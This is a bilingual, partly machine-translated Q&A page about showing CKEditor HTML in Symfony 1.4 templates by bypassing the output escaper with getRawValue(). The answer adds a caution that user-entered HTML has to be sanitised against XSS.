在模板中显示html标签 - symfony和CKEDITOR。如何安全? [英] show html tags in template - symfony and CKEDITOR. how safety?
问题描述
我使用Symfony 1.4和Doctrine 1.2。我安装了插件 http://www.symfony-project.org/plugins/sfCkPlugin b $ b如果我从表单中添加网络数据,这个工作正常,但是在模板中,例如: ;< b取代;粗体< / b个< I>试验< / I>< / p为H.
等
而不是
粗体 test
我必须在这里添加一些东西:getDesc ()?>,但什么?
在数据库MySQL中,我有:
< p为H. <强>粗体< /强> < U>试验< / U>< / p为H.
这是安全吗?
你可以通过在数据上调用getRawValue()来修复它:
$ obj-> getDesc() - > getRawValue();
请记住,如果你这样做,你需要确保html / javascript /其他已输入可安全输出在页面上。如果它来自后端,您可能确定。但是,如果它来自最终用户,则应确保您安全(阻止XSS攻击,防止破坏布局的HTML等)。这是一个很大的话题!
i use Symfony 1.4 and Doctrine 1.2. I installed plugin http://www.symfony-project.org/plugins/sfCkPlugin if i add net data from form this working ok, but in template this show me for example:
<p><b>bold</b> <i>test</i></p>
etc
instead of
bold test
I must something add here: getDesc() ?> , but what?
In database MySQL i have:
<p> <strong>bold</strong> <u>test</u></p>
this is safety?
This is happening because of the output escaper in symfony.
You can fix it by calling getRawValue() on the data:
$obj->getDesc()->getRawValue();
Bear in mind that if you do this, you need to ensure that the html/javascript/whatever else has been entered is safe to output on the page. If it's coming from a backend, you are probably ok. But if it's coming from end users, you should ensure you make it safe (block XSS attacks, prevent html that breaks the layout, etc). It's a big topic!
这篇关于在模板中显示html标签 - symfony和CKEDITOR。如何安全?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!